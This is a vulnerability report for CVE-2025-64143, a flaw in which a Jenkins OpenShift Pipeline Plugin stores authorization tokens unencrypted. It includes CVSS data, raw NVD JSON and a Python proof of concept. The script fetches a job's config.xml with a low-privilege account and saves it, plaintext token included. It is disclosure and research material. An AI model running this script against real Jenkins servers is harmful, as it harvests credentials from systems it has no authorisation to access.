Security Vulnerability Report
CVE-2025-64143 CVSS 4.3 MEDIUM

CVE-2025-64143

Published: 2025-10-29 14:15:59
Last Modified: 2025-11-04 22:16:41

Description

Jenkins OpenShift Pipeline Plugin 1.0.57 and earlier stores authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:openshift_pipeline:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins OpenShift Pipeline Plugin <= 1.0.57

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
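# CVE-2025-64143 PoC - Jenkins OpenShift Pipeline Plugin Token Extraction
# Requires Jenkins Item/Extended Read permission
#
# What this demonstrates: a job's config.xml is fetched with an ordinary
# account and scanned for elements whose tag name contains "password" or
# "token". With OpenShift Pipeline Plugin <= 1.0.57 the authorization token
# is stored in that file unencrypted (CWE-311).
#
# Defender notes:
# - A token found in config.xml should be treated as exposed and rotated at
#   the system that issued it.
# - Exposure is bounded by who holds Item/Extended Read and who can read the
#   controller's file system; review both.
# - Requests for /job/<name>/config.xml are visible in reverse-proxy or
#   access logs where those are enabled.
# - See the vendor advisory (SECURITY-3553) for fix status.
import os
import xml.etree.ElementTree as ET

import requests
from bs4 import BeautifulSoup  # kept from the original listing; nothing below uses it

# NOTE(review): with a plain http:// URL the basic-auth API token below is sent
# in clear text; use https:// when the controller offers it.
JENKINS_URL = "http://target-jenkins-server:8080"
JOB_NAME = "vulnerable-openshift-job"
USERNAME = "attacker"
API_TOKEN = "attacker-api-token"

# requests has no default timeout; without one a stalled controller hangs the script.
_REQUEST_TIMEOUT = 10  # seconds
_SENSITIVE_MARKERS = ("password", "token")


def _redacted(value):
    """Describe a field value without echoing the secret itself."""
    if value is None or not value.strip():
        return "<empty>"
    return f"<redacted, {len(value.strip())} characters, stored in plain text>"


def extract_config_xml():
    """Fetch the job's config.xml and report token/password fields found in it.

    Returns:
        The raw config.xml text when the request succeeds and the body parses
        as XML; None when the request fails, the status is not 200, or the
        body is not XML (for example an HTML login page).
    """
    session = requests.Session()
    session.auth = (USERNAME, API_TOKEN)

    # Method 1: Via Jenkins API
    config_url = f"{JENKINS_URL}/job/{JOB_NAME}/config.xml"
    try:
        response = session.get(config_url, timeout=_REQUEST_TIMEOUT)
    except requests.RequestException as err:
        print(f"Failed to access config: {err}")
        return None

    if response.status_code != 200:
        print(f"Failed to access config: {response.status_code}")
        return None

    # NOTE(review): xml.etree is not hardened against maliciously constructed
    # XML; the document parsed here is whatever the controller returns.
    try:
        root = ET.fromstring(response.content)
    except ET.ParseError as err:
        print(f"Failed to parse config.xml: {err}")
        return None

    # Report which fields are stored unencrypted. The value is not printed:
    # the finding is that the field is readable, and echoing it would copy the
    # secret into terminal scrollback and CI logs.
    for elem in root.iter():
        tag = elem.tag.lower()
        if any(marker in tag for marker in _SENSITIVE_MARKERS):
            print(f"Found sensitive field: {elem.tag}")
            print(f"Value: {_redacted(elem.text)}")

    return response.text


def extract_via_api():
    """Fetch the job's remote-API XML document at depth=1.

    NOTE(review): the original comment described this as returning config.xml;
    the URL requested is /api/xml, which looks like the job metadata endpoint
    rather than the stored configuration - confirm before relying on it.
    Nothing in this script calls this function.

    Returns:
        The response body as text, whatever the status code.
    """
    session = requests.Session()
    session.auth = (USERNAME, API_TOKEN)

    api_url = f"{JENKINS_URL}/job/{JOB_NAME}/api/xml?depth=1"
    response = session.get(api_url, timeout=_REQUEST_TIMEOUT)
    return response.text


if __name__ == "__main__":
    config = extract_config_xml()
    if config:
        # Save for analysis. The saved copy still contains the plaintext
        # token, so it is created owner-only (the mode applies when the file
        # is created; an existing file keeps its permissions) and should be
        # deleted once the finding is recorded.
        out_path = f"{JOB_NAME}_config.xml"
        fd = os.open(out_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(config)
        print(f"Config saved to {JOB_NAME}_config.xml")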

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64143", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:58.993", "lastModified": "2025-11-04T22:16:41.010", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins OpenShift Pipeline Plugin 1.0.57 and earlier stores authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:openshift_pipeline:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "1.0.57", "matchCriteriaId": "D163A2B0-4F41-4A68-B2B4-36E4387DF88C"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3553", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}